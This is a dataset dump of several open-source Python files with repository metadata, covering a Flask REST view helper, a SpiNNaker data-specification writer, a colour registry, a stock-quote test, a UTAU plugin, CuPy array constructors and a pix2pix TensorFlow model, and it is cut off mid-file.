2,036
py
Python
src/cihpc/www/rest/__init__.py
janhybs/ci-hpi
293740c7af62ecada5744ff663266de2e3d37445
[ "MIT" ]
1
2020-01-09T13:00:18.000Z
2020-01-09T13:00:18.000Z
src/cihpc/www/rest/__init__.py
janhybs/ci-hpi
293740c7af62ecada5744ff663266de2e3d37445
[ "MIT" ]
null
null
null
src/cihpc/www/rest/__init__.py
janhybs/ci-hpi
293740c7af62ecada5744ff663266de2e3d37445
[ "MIT" ]
2
2018-08-12T01:13:28.000Z
2018-08-13T14:37:28.000Z
#!/bin/python3 # author: Jan Hybs from loguru import logger from flask_restful import Resource from cihpc.common.utils import strings from cihpc.common.utils import datautils as du
29.507246
118
0.543222
#!/bin/python3 # author: Jan Hybs from loguru import logger from flask_restful import Resource from cihpc.common.utils import strings from cihpc.common.utils import datautils as du class ConfigurableView(Resource): def __init__(self): super(ConfigurableView, self).__init__() @classmethod def _process_list_args(cls, value): result: dict = dict([tuple(v.split('=')) for v in value]) for k, v in result.items(): if v.lower() == 'true': result[k] = True elif v.lower() == 'false': result[k] = False else: try: result[k] = int(v) except: result[k] = v return result @classmethod def error_empty_df(cls, filters): logger.info(f'empty result') return cls.show_error( status=300, message='No results found', description='\n'.join([ '<p>This usually means provided filters filtered out everything.</p>', '<p>DEBUG: The following filters were applied:</p>', '<pre><code>%s</code></pre>' % strings.to_json(filters) ]) ) @classmethod def show_error(cls, message, status=400, description=''): logger.info(f'error [{status}] {message}') return dict( status=status, message=message, description=description ) @classmethod def group_by(cls, df, groupby): """ :rtype: list[(list[str], list[str], list[str], pd.DataFrame)] """ if not groupby: yield ('', '', '', df) else: keys = du.ensure_iterable(list(groupby.keys())) names = du.ensure_iterable(list(groupby.values())) for group_values, group_data in df.groupby(keys): yield ( du.ensure_iterable(group_values), du.ensure_iterable(keys), du.ensure_iterable(names), group_data)
1,107
721
23
28bc94dd5ea00429c9ff3030fa52184e52e1be49
3,624
py
Python
src/spinnaker_ros_lsm/venv/lib/python2.7/site-packages/spinn_front_end_common/interface/interface_functions/front_end_common_partitionable_graph_data_specification_writer.py
Roboy/LSM_SpiNNaker_MyoArm
04fa1eaf78778edea3ba3afa4c527d20c491718e
[ "BSD-3-Clause" ]
2
2020-11-01T13:22:11.000Z
2020-11-01T13:22:20.000Z
src/spinnaker_ros_lsm/venv/lib/python2.7/site-packages/spinn_front_end_common/interface/interface_functions/front_end_common_partitionable_graph_data_specification_writer.py
Roboy/LSM_SpiNNaker_MyoArm
04fa1eaf78778edea3ba3afa4c527d20c491718e
[ "BSD-3-Clause" ]
null
null
null
src/spinnaker_ros_lsm/venv/lib/python2.7/site-packages/spinn_front_end_common/interface/interface_functions/front_end_common_partitionable_graph_data_specification_writer.py
Roboy/LSM_SpiNNaker_MyoArm
04fa1eaf78778edea3ba3afa4c527d20c491718e
[ "BSD-3-Clause" ]
null
null
null
from spinn_machine.utilities.progress_bar import ProgressBar from spinn_front_end_common.abstract_models.\ abstract_data_specable_vertex import AbstractDataSpecableVertex from spinn_front_end_common.utilities.utility_objs.executable_targets import \ ExecutableTargets from spinn_front_end_common.utilities import exceptions class FrontEndCommonPartitionableGraphDataSpecificationWriter(object): """ Executes a partitionable graph data specification generation """ def __call__( self, placements, graph_mapper, tags, executable_finder, partitioned_graph, partitionable_graph, routing_infos, hostname, report_default_directory, write_text_specs, app_data_runtime_folder): """ generates the dsg for the graph. :return: """ # iterate though subvertices and call generate_data_spec for each # vertex executable_targets = ExecutableTargets() dsg_targets = dict() # create a progress bar for end users progress_bar = ProgressBar(len(list(placements.placements)), "Generating data specifications") for placement in placements.placements: associated_vertex = graph_mapper.get_vertex_from_subvertex( placement.subvertex) self._generate_data_spec_for_subvertices( placement, associated_vertex, executable_targets, dsg_targets, graph_mapper, tags, executable_finder, partitioned_graph, partitionable_graph, routing_infos, hostname, report_default_directory, write_text_specs, app_data_runtime_folder) progress_bar.update() # finish the progress bar progress_bar.end() return {'executable_targets': executable_targets, 'dsg_targets': dsg_targets}
41.655172
78
0.678532
from spinn_machine.utilities.progress_bar import ProgressBar from spinn_front_end_common.abstract_models.\ abstract_data_specable_vertex import AbstractDataSpecableVertex from spinn_front_end_common.utilities.utility_objs.executable_targets import \ ExecutableTargets from spinn_front_end_common.utilities import exceptions class FrontEndCommonPartitionableGraphDataSpecificationWriter(object): """ Executes a partitionable graph data specification generation """ def __call__( self, placements, graph_mapper, tags, executable_finder, partitioned_graph, partitionable_graph, routing_infos, hostname, report_default_directory, write_text_specs, app_data_runtime_folder): """ generates the dsg for the graph. :return: """ # iterate though subvertices and call generate_data_spec for each # vertex executable_targets = ExecutableTargets() dsg_targets = dict() # create a progress bar for end users progress_bar = ProgressBar(len(list(placements.placements)), "Generating data specifications") for placement in placements.placements: associated_vertex = graph_mapper.get_vertex_from_subvertex( placement.subvertex) self._generate_data_spec_for_subvertices( placement, associated_vertex, executable_targets, dsg_targets, graph_mapper, tags, executable_finder, partitioned_graph, partitionable_graph, routing_infos, hostname, report_default_directory, write_text_specs, app_data_runtime_folder) progress_bar.update() # finish the progress bar progress_bar.end() return {'executable_targets': executable_targets, 'dsg_targets': dsg_targets} def _generate_data_spec_for_subvertices( self, placement, associated_vertex, executable_targets, dsg_targets, graph_mapper, tags, executable_finder, partitioned_graph, partitionable_graph, routing_infos, hostname, report_default_directory, write_text_specs, app_data_runtime_folder): # if the vertex can generate a DSG, call it if isinstance(associated_vertex, AbstractDataSpecableVertex): ip_tags = tags.get_ip_tags_for_vertex( placement.subvertex) reverse_ip_tags = tags.get_reverse_ip_tags_for_vertex( placement.subvertex) file_path = associated_vertex.generate_data_spec( placement.subvertex, placement, partitioned_graph, partitionable_graph, routing_infos, hostname, graph_mapper, report_default_directory, ip_tags, reverse_ip_tags, write_text_specs, app_data_runtime_folder) # link dsg file to subvertex dsg_targets[placement.x, placement.y, placement.p] = file_path # Get name of binary from vertex binary_name = associated_vertex.get_binary_file_name() # Attempt to find this within search paths binary_path = executable_finder.get_executable_path( binary_name) if binary_path is None: raise exceptions.ExecutableNotFoundException(binary_name) if not executable_targets.has_binary(binary_path): executable_targets.add_binary(binary_path) executable_targets.add_processor( binary_path, placement.x, placement.y, placement.p)
1,697
0
27
9d9964d264e68dcb80b3c95e97441214bc9d5263
1,719
py
Python
sveetoy_cli/colors/registry.py
sveetch/sveetoy-cli
b73159e657b9d23e2cffc70869b82c2024439ae1
[ "MIT" ]
null
null
null
sveetoy_cli/colors/registry.py
sveetch/sveetoy-cli
b73159e657b9d23e2cffc70869b82c2024439ae1
[ "MIT" ]
3
2017-11-16T00:35:13.000Z
2017-11-24T23:59:29.000Z
sveetoy_cli/colors/registry.py
sveetch/sveetoy-cli
b73159e657b9d23e2cffc70869b82c2024439ae1
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- import io, json from pathlib import Path class ColorRegistry: """ Open, read and store color names maps Default shipped color registry is used on loading if no specific path is given to ``load`` method. """ def load(self, path=None): """ Load registry and set maps Keyword args: path (pathlib.Path): Optionnal path object to open instead of default of from ``ColorRegistry.map_path``. """ names = self.get_registry_file(path or self.map_path) self.name_map, self.hexa_map = self.get_registry_maps(names) def get_registry_file(self, path): """ Open registry file from given path Args: path (pathlib.Path): Path object to open. Returns: list: List of map items from registry. """ with io.open(str(path), 'r') as fp: registry_map = json.load(fp) return registry_map def get_registry_maps(self, items): """ From registry items build maps, one indexed on name, another one indexed on color. Args: items (list): Registry items Returns: tuple: First item is the names map, second item is the colors map. Both are list object. """ name_map = items # Reverse keys/values so map is indexed on hexa hexa_map = list(zip([v for k,v in items], [k for k,v in items])) return name_map, hexa_map
26.446154
78
0.585224
# -*- coding: utf-8 -*- import io, json from pathlib import Path class ColorRegistry: """ Open, read and store color names maps Default shipped color registry is used on loading if no specific path is given to ``load`` method. """ def __init__(self): datas_dirpath = Path(__file__).parent / "datas" self.map_path = datas_dirpath / "names.json" self.name_map, self.hexa_map = {}, {} def load(self, path=None): """ Load registry and set maps Keyword args: path (pathlib.Path): Optionnal path object to open instead of default of from ``ColorRegistry.map_path``. """ names = self.get_registry_file(path or self.map_path) self.name_map, self.hexa_map = self.get_registry_maps(names) def get_registry_file(self, path): """ Open registry file from given path Args: path (pathlib.Path): Path object to open. Returns: list: List of map items from registry. """ with io.open(str(path), 'r') as fp: registry_map = json.load(fp) return registry_map def get_registry_maps(self, items): """ From registry items build maps, one indexed on name, another one indexed on color. Args: items (list): Registry items Returns: tuple: First item is the names map, second item is the colors map. Both are list object. """ name_map = items # Reverse keys/values so map is indexed on hexa hexa_map = list(zip([v for k,v in items], [k for k,v in items])) return name_map, hexa_map
155
0
26
19ec1ada2edcd3626071d17e705fddd15c6842f3
705
py
Python
futuquant/testcase/person/eva/quote/test_get_multiple_history_kline.py
hxhxhx88/futuquant
a1b4a875604f1de451ddde4bfa3e713452482b0a
[ "Apache-2.0" ]
null
null
null
futuquant/testcase/person/eva/quote/test_get_multiple_history_kline.py
hxhxhx88/futuquant
a1b4a875604f1de451ddde4bfa3e713452482b0a
[ "Apache-2.0" ]
null
null
null
futuquant/testcase/person/eva/quote/test_get_multiple_history_kline.py
hxhxhx88/futuquant
a1b4a875604f1de451ddde4bfa3e713452482b0a
[ "Apache-2.0" ]
null
null
null
#-*-coding:utf-8-*- from futuquant import * import pandas if __name__ == '__main__': GetMulHtryKl().test1()
27.115385
140
0.62695
#-*-coding:utf-8-*- from futuquant import * import pandas class GetMulHtryKl(object): def test1(self): pandas.set_option('display.width',1000) pandas.set_option('max_columns',1000) quote_ctx = OpenQuoteContext(host='127.0.0.1',port=11111) codelist = ['HK.999011'] start = '2018-06-29' #'2018-07-01' end = '2018-07-13' ktype = KLType.K_30M autype = AuType.QFQ ret_code, ret_data = quote_ctx.get_multiple_history_kline(codelist = codelist,start = start,end = end,ktype = ktype,autype = autype) print(ret_code) print(ret_data) quote_ctx.close() if __name__ == '__main__': GetMulHtryKl().test1()
534
6
50
9473573f60bf4ff2c4fdba5a8b551bc8fd0d7cd6
308
py
Python
_archive/ren2tan/ren2tan.py
oatsu-gh/utau-plugins
c742ed09f6dae3b52d2d1679890194add56f0fd9
[ "Beerware" ]
1
2021-08-31T00:51:48.000Z
2021-08-31T00:51:48.000Z
_archive/ren2tan/ren2tan.py
oatsu-gh/utau_plugins
82f2145fc044a6028f7f7a88a74689797a4b83df
[ "Beerware" ]
null
null
null
_archive/ren2tan/ren2tan.py
oatsu-gh/utau_plugins
82f2145fc044a6028f7f7a88a74689797a4b83df
[ "Beerware" ]
null
null
null
#!/usr/bin/env python3 # Copyright (c) 2021 oatsu """ 連続音歌詞を空白で区切って単独音にするUTAUプラグイン """ import utaupy def ren2tan(plugin): """ 歌詞を空白で区切って、空白より後ろ側だけ残す。 """ for note in plugin.notes: note.lyric = note.lyric.split()[-1] if __name__ == '__main__': utaupy.utauplugin.run(ren2tan)
14.666667
43
0.649351
#!/usr/bin/env python3 # Copyright (c) 2021 oatsu """ 連続音歌詞を空白で区切って単独音にするUTAUプラグイン """ import utaupy def ren2tan(plugin): """ 歌詞を空白で区切って、空白より後ろ側だけ残す。 """ for note in plugin.notes: note.lyric = note.lyric.split()[-1] if __name__ == '__main__': utaupy.utauplugin.run(ren2tan)
0
0
0
8a58b436d68c59696458a2751cff5fe08edd9a40
5,422
py
Python
cupy/creation/basic.py
fukuta0614/Chainer
337fe78e1c27924c1195b8b677a9b2cd3ea68828
[ "MIT" ]
null
null
null
cupy/creation/basic.py
fukuta0614/Chainer
337fe78e1c27924c1195b8b677a9b2cd3ea68828
[ "MIT" ]
1
2016-11-09T06:32:32.000Z
2016-11-09T10:20:04.000Z
cupy/creation/basic.py
fukuta0614/Chainer
337fe78e1c27924c1195b8b677a9b2cd3ea68828
[ "MIT" ]
1
2021-05-27T16:52:11.000Z
2021-05-27T16:52:11.000Z
import cupy def empty(shape, dtype=float): """Returns an array without initializing the elements. This function currently does not support ``order`` option. Args: shape (tuple of ints): Dimensionalities of the array. dtype: Data type specifier. Returns: cupy.ndarray: A new array with elements not initialized. .. seealso:: :func:`numpy.empty` """ # TODO(beam2d): Support ordering option return cupy.ndarray(shape, dtype=dtype) def empty_like(a, dtype=None): """Returns a new array with same shape and dtype of a given array. This function currently does not support ``order`` and ``subok`` options. Args: a (cupy.ndarray): Base array. dtype: Data type specifier. The data type of ``a`` is used by default. Returns: cupy.ndarray: A new array with same shape and dtype of ``a`` with elements not initialized. .. seealso:: :func:`numpy.empty_like` """ # TODO(beam2d): Support ordering option if dtype is None: dtype = a.dtype return empty(a.shape, dtype=dtype) def eye(N, M=None, k=0, dtype=float): """Returns a 2-D array with ones on the diagonals and zeros elsewhere. Args: N (int): Number of rows. M (int): Number of columns. M == N by default. k (int): Index of the diagonal. Zero indicates the main diagonal, a positive index an upper diagonal, and a negative index a lower diagonal. dtype: Data type specifier. Returns: cupy.ndarray: A 2-D array with given diagonals filled with ones and zeros elsewhere. .. seealso:: :func:`numpy.eye` """ if M is None: M = N ret = zeros((N, M), dtype) ret.diagonal(k)[:] = 1 return ret def identity(n, dtype=float): """Returns a 2-D identity array. It is equivalent to ``eye(n, n, dtype)``. Args: n (int): Number of rows and columns. dtype: Data type specifier. Returns: cupy.ndarray: A 2-D identity array. .. seealso:: :func:`numpy.identity` """ return eye(n, dtype=dtype) def ones(shape, dtype=float): """Returns a new array of given shape and dtype, filled with ones. This function currently does not support ``order`` option. Args: shape (tuple of ints): Dimensionalities of the array. dtype: Data type specifier. Returns: cupy.ndarray: An array filled with ones. .. seealso:: :func:`numpy.ones` """ # TODO(beam2d): Support ordering option return full(shape, 1, dtype) def ones_like(a, dtype=None): """Returns an array of ones with same shape and dtype as a given array. This function currently does not support ``order`` and ``subok`` options. Args: a (cupy.ndarray): Base array. dtype: Data type specifier. The dtype of ``a`` is used by default. Returns: cupy.ndarray: An array filled with ones. .. seealso:: :func:`numpy.ones_like` """ # TODO(beam2d): Support ordering option if dtype is None: dtype = a.dtype return ones(a.shape, dtype) def zeros(shape, dtype=float): """Returns a new array of given shape and dtype, filled with zeros. This function currently does not support ``order`` option. Args: shape (tuple of ints): Dimensionalities of the array. dtype: Data type specifier. Returns: cupy.ndarray: An array filled with ones. .. seealso:: :func:`numpy.zeros` """ # TODO(beam2d): Support ordering option a = empty(shape, dtype) a.data.memset(0, a.nbytes) return a def zeros_like(a, dtype=None): """Returns an array of zeros with same shape and dtype as a given array. This function currently does not support ``order`` and ``subok`` options. Args: a (cupy.ndarray): Base array. dtype: Data type specifier. The dtype of ``a`` is used by default. Returns: cupy.ndarray: An array filled with ones. .. seealso:: :func:`numpy.zeros_like` """ # TODO(beam2d): Support ordering option if dtype is None: dtype = a.dtype return zeros(a.shape, dtype=dtype) def full(shape, fill_value, dtype=None): """Returns a new array of given shape and dtype, filled with a given value. This function currently does not support ``order`` option. Args: shape (tuple of ints): Dimensionalities of the array. fill_value: A scalar value to fill a new array. dtype: Data type specifier. Returns: cupy.ndarray: An array filled with ``fill_value``. .. seealso:: :func:`numpy.full` """ # TODO(beam2d): Support ordering option a = empty(shape, dtype) a.fill(fill_value) return a def full_like(a, fill_value, dtype=None): """Returns a full array with same shape and dtype as a given array. This function currently does not support ``order`` and ``subok`` options. Args: a (cupy.ndarray): Base array. fill_value: A scalar value to fill a new array. dtype: Data type specifier. The dtype of ``a`` is used by default. Returns: cupy.ndarray: An array filled with ``fill_value``. .. seealso:: :func:`numpy.full_like` """ # TODO(beam2d): Support ordering option if dtype is None: dtype = a.dtype return full(a.shape, fill_value, dtype)
25.575472
79
0.629288
import cupy def empty(shape, dtype=float): """Returns an array without initializing the elements. This function currently does not support ``order`` option. Args: shape (tuple of ints): Dimensionalities of the array. dtype: Data type specifier. Returns: cupy.ndarray: A new array with elements not initialized. .. seealso:: :func:`numpy.empty` """ # TODO(beam2d): Support ordering option return cupy.ndarray(shape, dtype=dtype) def empty_like(a, dtype=None): """Returns a new array with same shape and dtype of a given array. This function currently does not support ``order`` and ``subok`` options. Args: a (cupy.ndarray): Base array. dtype: Data type specifier. The data type of ``a`` is used by default. Returns: cupy.ndarray: A new array with same shape and dtype of ``a`` with elements not initialized. .. seealso:: :func:`numpy.empty_like` """ # TODO(beam2d): Support ordering option if dtype is None: dtype = a.dtype return empty(a.shape, dtype=dtype) def eye(N, M=None, k=0, dtype=float): """Returns a 2-D array with ones on the diagonals and zeros elsewhere. Args: N (int): Number of rows. M (int): Number of columns. M == N by default. k (int): Index of the diagonal. Zero indicates the main diagonal, a positive index an upper diagonal, and a negative index a lower diagonal. dtype: Data type specifier. Returns: cupy.ndarray: A 2-D array with given diagonals filled with ones and zeros elsewhere. .. seealso:: :func:`numpy.eye` """ if M is None: M = N ret = zeros((N, M), dtype) ret.diagonal(k)[:] = 1 return ret def identity(n, dtype=float): """Returns a 2-D identity array. It is equivalent to ``eye(n, n, dtype)``. Args: n (int): Number of rows and columns. dtype: Data type specifier. Returns: cupy.ndarray: A 2-D identity array. .. seealso:: :func:`numpy.identity` """ return eye(n, dtype=dtype) def ones(shape, dtype=float): """Returns a new array of given shape and dtype, filled with ones. This function currently does not support ``order`` option. Args: shape (tuple of ints): Dimensionalities of the array. dtype: Data type specifier. Returns: cupy.ndarray: An array filled with ones. .. seealso:: :func:`numpy.ones` """ # TODO(beam2d): Support ordering option return full(shape, 1, dtype) def ones_like(a, dtype=None): """Returns an array of ones with same shape and dtype as a given array. This function currently does not support ``order`` and ``subok`` options. Args: a (cupy.ndarray): Base array. dtype: Data type specifier. The dtype of ``a`` is used by default. Returns: cupy.ndarray: An array filled with ones. .. seealso:: :func:`numpy.ones_like` """ # TODO(beam2d): Support ordering option if dtype is None: dtype = a.dtype return ones(a.shape, dtype) def zeros(shape, dtype=float): """Returns a new array of given shape and dtype, filled with zeros. This function currently does not support ``order`` option. Args: shape (tuple of ints): Dimensionalities of the array. dtype: Data type specifier. Returns: cupy.ndarray: An array filled with ones. .. seealso:: :func:`numpy.zeros` """ # TODO(beam2d): Support ordering option a = empty(shape, dtype) a.data.memset(0, a.nbytes) return a def zeros_like(a, dtype=None): """Returns an array of zeros with same shape and dtype as a given array. This function currently does not support ``order`` and ``subok`` options. Args: a (cupy.ndarray): Base array. dtype: Data type specifier. The dtype of ``a`` is used by default. Returns: cupy.ndarray: An array filled with ones. .. seealso:: :func:`numpy.zeros_like` """ # TODO(beam2d): Support ordering option if dtype is None: dtype = a.dtype return zeros(a.shape, dtype=dtype) def full(shape, fill_value, dtype=None): """Returns a new array of given shape and dtype, filled with a given value. This function currently does not support ``order`` option. Args: shape (tuple of ints): Dimensionalities of the array. fill_value: A scalar value to fill a new array. dtype: Data type specifier. Returns: cupy.ndarray: An array filled with ``fill_value``. .. seealso:: :func:`numpy.full` """ # TODO(beam2d): Support ordering option a = empty(shape, dtype) a.fill(fill_value) return a def full_like(a, fill_value, dtype=None): """Returns a full array with same shape and dtype as a given array. This function currently does not support ``order`` and ``subok`` options. Args: a (cupy.ndarray): Base array. fill_value: A scalar value to fill a new array. dtype: Data type specifier. The dtype of ``a`` is used by default. Returns: cupy.ndarray: An array filled with ``fill_value``. .. seealso:: :func:`numpy.full_like` """ # TODO(beam2d): Support ordering option if dtype is None: dtype = a.dtype return full(a.shape, fill_value, dtype)
0
0
0
606ef29647dfca7025dc7a7bcba6b2c14ce348cc
24,399
py
Python
sciencebeam_gym/trainer/models/pix2pix/pix2pix_model.py
elifesciences/sciencebeam-gym
3ad654e08775e0c0cdd256753e14093bb5a42d44
[ "MIT" ]
25
2017-07-25T12:44:55.000Z
2020-09-30T22:16:50.000Z
sciencebeam_gym/trainer/models/pix2pix/pix2pix_model.py
elifesciences/sciencebeam-gym
3ad654e08775e0c0cdd256753e14093bb5a42d44
[ "MIT" ]
192
2017-11-29T08:57:03.000Z
2022-03-29T18:44:41.000Z
sciencebeam_gym/trainer/models/pix2pix/pix2pix_model.py
elifesciences/sciencebeam-gym
3ad654e08775e0c0cdd256753e14093bb5a42d44
[ "MIT" ]
6
2019-02-01T18:49:33.000Z
2020-07-26T08:18:46.000Z
from __future__ import absolute_import from __future__ import division from __future__ import print_function import logging import argparse import json from functools import reduce import tensorflow as tf from tensorflow.python.lib.io.file_io import FileIO # pylint: disable=E0611 from sciencebeam_gym.trainer.data.examples import ( get_matching_files, read_examples ) from sciencebeam_gym.preprocess.color_map import ( parse_color_map_from_file ) from sciencebeam_gym.tools.calculate_class_weights import ( tf_calculate_efnet_weights_for_frequency_by_label ) from sciencebeam_gym.trainer.models.pix2pix.tf_utils import ( find_nearest_centroid_indices ) from sciencebeam_gym.preprocess.preprocessing_utils import ( parse_page_range ) from sciencebeam_gym.trainer.models.pix2pix.pix2pix_core import ( BaseLoss, ALL_BASE_LOSS, create_pix2pix_model, create_other_summaries ) from sciencebeam_gym.trainer.models.pix2pix.evaluate import ( evaluate_separate_channels, evaluate_predictions, evaluation_summary ) from sciencebeam_gym.model_utils.channels import ( calculate_color_masks ) UNKNOWN_COLOR = (255, 255, 255) UNKNOWN_LABEL = 'unknown' DEFAULT_UNKNOWN_CLASS_WEIGHT = 0.1 class GraphReferences(object): """Holder of base tensors used for training model using common task.""" def create_model(argv=None): """Factory method that creates model to be used by generic task.py.""" parser = model_args_parser() args, task_args = parser.parse_known_args(argv) return Model(args), task_args
33.653793
100
0.612115
from __future__ import absolute_import from __future__ import division from __future__ import print_function import logging import argparse import json from functools import reduce import tensorflow as tf from tensorflow.python.lib.io.file_io import FileIO # pylint: disable=E0611 from sciencebeam_gym.trainer.data.examples import ( get_matching_files, read_examples ) from sciencebeam_gym.preprocess.color_map import ( parse_color_map_from_file ) from sciencebeam_gym.tools.calculate_class_weights import ( tf_calculate_efnet_weights_for_frequency_by_label ) from sciencebeam_gym.trainer.models.pix2pix.tf_utils import ( find_nearest_centroid_indices ) from sciencebeam_gym.preprocess.preprocessing_utils import ( parse_page_range ) from sciencebeam_gym.trainer.models.pix2pix.pix2pix_core import ( BaseLoss, ALL_BASE_LOSS, create_pix2pix_model, create_other_summaries ) from sciencebeam_gym.trainer.models.pix2pix.evaluate import ( evaluate_separate_channels, evaluate_predictions, evaluation_summary ) from sciencebeam_gym.model_utils.channels import ( calculate_color_masks ) UNKNOWN_COLOR = (255, 255, 255) UNKNOWN_LABEL = 'unknown' DEFAULT_UNKNOWN_CLASS_WEIGHT = 0.1 class GraphMode(object): TRAIN = 1 EVALUATE = 2 PREDICT = 3 def get_logger(): return logging.getLogger(__name__) class GraphReferences(object): """Holder of base tensors used for training model using common task.""" def __init__(self): self.is_training = None self.inputs = {} self.examples = None self.train = None self.global_step = None self.metric_updates = [] self.metric_values = [] self.predictions = [] self.input_jpeg = None self.input_uri = None self.image_tensor = None self.annotation_uri = None self.annotation_tensor = None self.separate_channel_annotation_tensor = None self.class_labels_tensor = None self.pred = None self.probabilities = None self.summary = None self.summaries = None self.image_tensors = None self.targets_class_indices = None self.outputs_class_indices = None self.output_layer_labels = None self.evaluation_result = None self.pos_weight = None def batch_dimensions_to_colors_list(image_tensor, colors): batch_images = [] for i, single_label_color in enumerate(colors): batch_images.append( tf.expand_dims( image_tensor[:, :, :, i], axis=-1 ) * ([x / 255.0 for x in single_label_color]) ) return batch_images def batch_dimensions_to_most_likely_colors_list(image_tensor, colors): with tf.variable_scope("batch_dimensions_to_most_likely_colors_list"): colors_tensor = tf.constant(colors, dtype=tf.uint8, name='colors') most_likely_class_index = tf.argmax(image_tensor, 3) return tf.gather(params=colors_tensor, indices=most_likely_class_index) def add_summary_image(tensors, name, image): tensors.image_tensors[name] = image tf.summary.image(name, image) def convert_image(image_tensor): return tf.image.convert_image_dtype( image_tensor, dtype=tf.uint8, saturate=True ) def add_simple_summary_image(tensors, name, image_tensor): with tf.name_scope(name): add_summary_image( tensors, name, convert_image(image_tensor) ) def replace_black_with_white_color(image_tensor): is_black = tf.reduce_all( tf.equal(image_tensor, (0, 0, 0)), axis=-1 ) is_black = tf.stack([is_black] * 3, axis=-1) return tf.where( is_black, 255 * tf.ones_like(image_tensor), image_tensor ) def combine_image(batch_images, replace_black_with_white=False): clipped_batch_images = [ tf.clip_by_value(batch_image, 0.0, 1.0) for batch_image in batch_images ] combined_image = convert_image( reduce( lambda a, b: a + b, clipped_batch_images ) ) if replace_black_with_white: combined_image = replace_black_with_white_color(combined_image) return combined_image def remove_last(a): return a[:-1] def add_model_summary_images( tensors, dimension_colors, dimension_labels, use_separate_channels=False, has_unknown_class=False): tensors.summaries = {} add_simple_summary_image( tensors, 'input', tensors.image_tensor ) add_simple_summary_image( tensors, 'target', tensors.annotation_tensor ) if (has_unknown_class or not use_separate_channels) and dimension_labels is not None: dimension_labels_with_unknown = dimension_labels + [UNKNOWN_LABEL] dimension_colors_with_unknown = dimension_colors + [(255, 255, 255)] else: dimension_labels_with_unknown = dimension_labels dimension_colors_with_unknown = dimension_colors if use_separate_channels: for name, outputs in [ ('targets', tensors.separate_channel_annotation_tensor), ('outputs', tensors.pred) ]: batch_images = batch_dimensions_to_colors_list( outputs, dimension_colors_with_unknown ) batch_images_excluding_unknown = ( remove_last(batch_images) if has_unknown_class else batch_images ) for i, (batch_image, dimension_label) in enumerate(zip( batch_images, dimension_labels_with_unknown)): suffix = "_{}_{}".format( i, dimension_label if dimension_label else 'unknown_label' ) add_simple_summary_image( tensors, name + suffix, batch_image ) with tf.name_scope(name + "_combined"): combined_image = combine_image(batch_images_excluding_unknown) if name == 'outputs': tensors.summaries['output_image'] = combined_image add_summary_image( tensors, name + "_combined", combined_image ) if name == 'outputs': with tf.name_scope(name + "_most_likely"): add_summary_image( tensors, name + "_most_likely", batch_dimensions_to_most_likely_colors_list( outputs, dimension_colors_with_unknown) ) else: add_simple_summary_image( tensors, "output", tensors.pred ) if tensors.outputs_class_indices is not None: outputs = tensors.pred with tf.name_scope("outputs_most_likely"): colors_tensor = tf.constant( dimension_colors_with_unknown, dtype=tf.uint8, name='colors' ) add_summary_image( tensors, "outputs_most_likely", tf.gather( params=colors_tensor, indices=tensors.outputs_class_indices ) ) tensors.summaries['output_image'] = tensors.image_tensors['output'] def parse_json_file(filename): with FileIO(filename, 'r') as f: return json.load(f) def class_weights_to_pos_weight( class_weights, labels, use_unknown_class, unknown_class_weight=DEFAULT_UNKNOWN_CLASS_WEIGHT): pos_weight = [class_weights[k] for k in labels] return pos_weight + [unknown_class_weight] if use_unknown_class else pos_weight def parse_color_map(color_map_filename): with FileIO(color_map_filename, 'r') as config_f: return parse_color_map_from_file( config_f ) def color_map_to_labels(color_map, labels=None): if labels: if not all(k in color_map for k in labels): raise ValueError( 'not all lables found in color map, labels=%s, available keys=%s' % (labels, color_map.keys()) ) return labels return sorted(color_map.keys()) def color_map_to_colors(color_map, labels): return [color_map[k] for k in labels] def colors_and_labels_with_unknown_class(colors, labels, use_unknown_class): if use_unknown_class or not colors: return ( colors + [UNKNOWN_COLOR], labels + [UNKNOWN_LABEL] ) else: return colors, labels def remove_none_from_dict(d: dict): return {k: v for k, v in d.items() if v is not None} def _create_pos_weights_tensor( base_loss, separate_channel_annotation_tensor, pos_weight_values, input_uri, debug): frequency_by_label = tf.reduce_sum( separate_channel_annotation_tensor, axis=[0, 1], keep_dims=True, name='frequency_by_channel' ) pos_weight_sample = tf_calculate_efnet_weights_for_frequency_by_label( frequency_by_label ) pos_weight = ( pos_weight_sample * pos_weight_values if base_loss == BaseLoss.WEIGHTED_SAMPLE_WEIGHTED_CROSS_ENTROPY else pos_weight_sample ) if debug: pos_weight = tf.Print( pos_weight, [ pos_weight, pos_weight_sample, frequency_by_label, input_uri ], 'pos weights, sample, frequency, uri: ', summarize=1000 ) get_logger().debug( 'pos_weight before batch: %s (frequency_by_label: %s)', pos_weight, frequency_by_label ) return pos_weight class Model(object): def __init__(self, args): self.args = args self.image_width = 256 self.image_height = 256 self.color_map = None self.pos_weight = None self.dimension_colors = None self.dimension_labels = None self.use_unknown_class = args.use_unknown_class self.use_separate_channels = args.use_separate_channels and self.args.color_map is not None logger = get_logger() logger.info('use_separate_channels: %s', self.use_separate_channels) if self.args.color_map: color_map = parse_color_map(args.color_map) class_weights = ( parse_json_file(self.args.class_weights) if ( self.args.class_weights and self.args.base_loss in { BaseLoss.WEIGHTED_CROSS_ENTROPY, BaseLoss.WEIGHTED_SAMPLE_WEIGHTED_CROSS_ENTROPY } ) else None ) available_labels = color_map_to_labels(color_map) if class_weights: # remove labels with zero class weights available_labels = [k for k in available_labels if class_weights.get(k, 0.0) != 0.0] self.dimension_labels = args.channels if args.channels else available_labels self.dimension_colors = color_map_to_colors(color_map, self.dimension_labels) self.dimension_colors_with_unknown, self.dimension_labels_with_unknown = ( colors_and_labels_with_unknown_class( self.dimension_colors, self.dimension_labels, self.use_unknown_class ) ) logger.debug("dimension_colors: %s", self.dimension_colors) logger.debug("dimension_labels: %s", self.dimension_labels) if class_weights: self.pos_weight = class_weights_to_pos_weight( class_weights, self.dimension_labels, self.use_separate_channels, class_weights.get(UNKNOWN_LABEL, DEFAULT_UNKNOWN_CLASS_WEIGHT) ) logger.info("pos_weight: %s", self.pos_weight) def _build_predict_graph(self): tensors = GraphReferences() input_image_tensor = tf.placeholder( tf.uint8, (None, None, None, 3), name='inputs_image' ) tensors.inputs = dict( image=input_image_tensor ) tensors.image_tensor = tf.image.resize_images( tf.image.convert_image_dtype(input_image_tensor, tf.float32), (self.image_height, self.image_width), method=tf.image.ResizeMethod.BILINEAR ) if self.use_separate_channels: n_output_channels = len(self.dimension_labels_with_unknown) else: n_output_channels = 3 pix2pix_model = create_pix2pix_model( tensors.image_tensor, None, self.args, is_training=False, pos_weight=tensors.pos_weight, n_output_channels=n_output_channels ) tensors.pred = pix2pix_model.outputs return tensors def build_graph(self, data_paths, batch_size, graph_mode): if graph_mode 